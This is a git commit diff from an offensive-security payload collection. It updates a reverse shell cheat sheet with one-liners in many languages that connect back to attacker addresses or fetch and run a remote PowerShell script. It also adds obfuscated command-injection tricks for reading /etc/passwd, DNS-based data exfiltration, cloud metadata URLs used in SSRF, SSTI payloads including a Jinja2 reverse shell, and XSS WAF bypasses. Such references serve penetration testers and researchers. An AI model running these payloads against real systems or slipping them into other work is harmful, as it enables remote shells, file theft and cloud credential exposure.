Multiple update in READMEs + RCE tricks

This commit is contained in:
Swissky 2018-08-12 00:17:58 +02:00
parent b20cdde4d9
commit 177c12cb79
16 changed files with 153 additions and 98 deletions

View File

@ -2,14 +2,14 @@
## Reverse Shell Cheat Sheet ## Reverse Shell Cheat Sheet
Bash TCP ### Bash TCP
```bash ```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
``` ```
Bash UDP ### Bash UDP
``` ```
Victim: Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
@ -19,7 +19,7 @@ nc -u -lvp 4242
``` ```
Perl ### Perl
```perl ```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@ -30,17 +30,17 @@ NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
``` ```
Python ### Python
```python ```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
``` ```
PHP ### PHP
```bash ```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
``` ```
Ruby ### Ruby
```ruby ```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
``` ```
Netcat Traditional ### Netcat Traditional
```bash ```bash
nc -e /bin/sh [IPADDR] [PORT] nc -e /bin/sh [IPADDR] [PORT]
``` ```
Netcat OpenBsd ### Netcat OpenBsd
```bash ```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
``` ```
Ncat ### Ncat
```bash ```bash
ncat 127.0.0.1 4444 -e /bin/bash ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash
``` ```
Powershell ### Powershell
```powershell ```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
``` ```
Java ### Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() p.waitFor()
``` ```
NodeJS ### NodeJS
```javascript ```javascript
(function(){ (function(){
var net = require("net"), var net = require("net"),
@ -102,8 +102,28 @@ NodeJS
}); });
return /a/; // Prevents the Node.js application form crashing return /a/; // Prevents the Node.js application form crashing
})(); })();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
``` ```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
```javascript
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
NOTE: Java reverse shell also work for Groovy
## Spawn TTY ## Spawn TTY
``` ```
/bin/sh -i /bin/sh -i

132
README.md
View File

@ -29,46 +29,72 @@ You might also like :
* Tomcat CVE-2017-12617.py * Tomcat CVE-2017-12617.py
## Tools ## Try Harder
* [Kali Linux](https://www.kali.org/) Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum * __Bug Bounty Platforms__
* [Burp Proxy](https://portswigger.net) * [HackerOne](https://hackerone.com)
* [Fiddler](https://www.telerik.com/download/fiddler) * [BugCrowd](https://bugcrowd.com)
* [DirBuster](https://sourceforge.net/projects/dirbuster/) * [Bounty Factory](https://bountyfactory.io)
* [GoBuster](https://github.com/OJ/gobuster) * [Synack](https://www.synack.com/)
* [Knockpy](https://github.com/guelfoweb/knock) * [Intigriti](https://www.intigriti.com)
* [SQLmap](http://sqlmap.org) * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
* [Nikto](https://cirt.net/nikto2) * __Online Platforms__
* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) * [Hack The Box](hackthebox.eu/)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
* [Wappalyzer](https://wappalyzer.com/download) * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Metasploit](https://www.metasploit.com/) * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [OpenVAS](http://www.openvas.org/) * [Root-Me](https://www.root-me.org)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [Hackers.gg](hackers.gg)
* [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## Online Challenges ## More resources
* [Hack The Box](hackthebox.eu/)
* [Root-Me](https://www.root-me.org)
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Hackers.gg](hackers.gg)
## Bug Bounty ### Blogs/Websites
* [HackerOne](https://hackerone.com) * [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
* [BugCrowd](https://bugcrowd.com) * [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
* [Bounty Factory](https://bountyfactory.io) * [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) * [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
## Docker ### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
### Docker
| Command | Link | | Command | Link |
| :------------- | :------------- | | :------------- | :------------- |
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
@ -83,37 +109,3 @@ You might also like :
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) | | `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) | | `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) | | `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
## More resources
### Book's list:
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
### Blogs/Websites
* http://blog.zsec.uk/101-web-testing-tooling/
* https://blog.innerht.ml
* https://blog.zsec.uk
* https://www.exploit-db.com/google-hacking-database
* https://www.arneswinnen.net
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)

View File

@ -1,5 +1,6 @@
# Remote Commands Execution # Remote Commands Execution
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits ## Exploits
@ -87,6 +88,13 @@ Bypass blacklisted word with $@
who$@ami who$@ami
``` ```
Bypass blacklisted word with variable expansion
```powershell
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
Bypass zsh/bash/sh blacklist Bypass zsh/bash/sh blacklist
```powershell ```powershell
echo $0 echo $0
@ -94,6 +102,12 @@ echo $0
echo whoami|$0 echo whoami|$0
``` ```
## Challenge
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
## Time based data exfiltration ## Time based data exfiltration
Extracting data : char by char Extracting data : char by char
@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
``` ```
## Environment based
NodeJS Commands execution
```powershell
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```
## Thanks to ## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)

View File

@ -1,6 +1,23 @@
# Server-Side Request Forgery # Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
## Summary
* [Exploit with localhost]()
* [Bypassing filters]()
* [SSRF via URL Scheme]()
* [SSRF to XSS]()
* [SSRF URL for Cloud Instances]()
* [SSRF URL for AWS Bucket]()
* [SSRF URL for Google Cloud]()
* [SSRF URL for Digital Ocean]()
* [SSRF URL for Packetcloud]()
* [SSRF URL for Azure]()
* [SSRF URL for OpenStack/RackSpace]()
* [SSRF URL for HP Helion]()
* [SSRF URL for Oracle Cloud]()
* [SSRF URL for Alibaba]()
## Exploit with localhost ## Exploit with localhost
Basic SSRF v1 Basic SSRF v1
@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
``` ```
## SSRF URL for Cloud Instances
## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) ### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at http://169.254.169.254 Interesting path to look for at http://169.254.169.254
``` ```
Always here : /latest/meta-data/{hostname,public-ipv4,...} Always here : /latest/meta-data/{hostname,public-ipv4,...}
@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
``` ```
## SSRF URL for Google Cloud ### SSRF URL for Google Cloud
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
``` ```
http://169.254.169.254/computeMetadata/v1/ http://169.254.169.254/computeMetadata/v1/
@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
``` ```
## SSRF URL for Digital Ocean ### SSRF URL for Digital Ocean
https://developers.digitalocean.com/documentation/metadata/ https://developers.digitalocean.com/documentation/metadata/
```powershell ```powershell
curl http://169.254.169.254/metadata/v1/id curl http://169.254.169.254/metadata/v1/id
@ -291,12 +309,12 @@ All in one request:
curl http://169.254.169.254/metadata/v1.json | jq curl http://169.254.169.254/metadata/v1.json | jq
``` ```
## SSRF URL for Packetcloud ### SSRF URL for Packetcloud
``` ```
https://metadata.packet.net/userdata https://metadata.packet.net/userdata
``` ```
## SSRF URL for Azure ### SSRF URL for Azure
Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/ Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
``` ```
http://169.254.169.254/metadata/v1/maintenance http://169.254.169.254/metadata/v1/maintenance
@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
``` ```
## SSRF URL for OpenStack/RackSpace ### SSRF URL for OpenStack/RackSpace
(header required? unknown) (header required? unknown)
``` ```
http://169.254.169.254/openstack http://169.254.169.254/openstack
``` ```
## SSRF URL for HP Helion ### SSRF URL for HP Helion
(header required? unknown) (header required? unknown)
``` ```
http://169.254.169.254/2009-04-04/meta-data/ http://169.254.169.254/2009-04-04/meta-data/
``` ```
## SSRF URL for Oracle Cloud ### SSRF URL for Oracle Cloud
``` ```
http://192.0.0.192/latest/ http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/ http://192.0.0.192/latest/user-data/
@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/ http://192.0.0.192/latest/attributes/
``` ```
## SSRF URL for Alibaba ### SSRF URL for Alibaba
``` ```
http://100.100.100.200/latest/meta-data/ http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/instance-id

View File

@ -5,10 +5,11 @@
Recommended tool: [Tplmap](https://github.com/epinna/tplmap) Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
e.g: e.g:
``` ```
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
``` ```
## Ruby ## Ruby
### Basic injection ### Basic injection
```python ```python
@ -22,7 +23,7 @@ e.g:
## Java ## Java
### Basic injection ### Basic injection
```java ```java
${7*7} ${7*7}
${{7*7}} ${{7*7}}
@ -174,6 +175,13 @@ Inject this template
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
``` ```
## AngularJS
### Basic injection
```javascript
$eval('1+1')
{{1+1}}
```
## Thanks to ## Thanks to
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)

View File

@ -18,8 +18,9 @@
5. The content of the cache is displayed 5. The content of the cache is displayed
``` ```
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) [![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
## Thanks to ## Thanks to
* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)

View File

@ -644,6 +644,12 @@ Exotic payloads
## Common WAF Bypass ## Common WAF Bypass
### Chrome Auditor - 9th august
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
### Incapsula WAF Bypass - 8th march ### Incapsula WAF Bypass - 8th march
```javascript ```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00</script><script>alert(document.domain)</script>uxldz
@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
Note : it requires user permission Note : it requires user permission
``` ```
Notification.requestPermission(x=>{new(Notification)(1)}) Notification.requestPermission(x=>{new(Notification)(1)})
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
``` ```
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
## Thanks to ## Thanks to
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot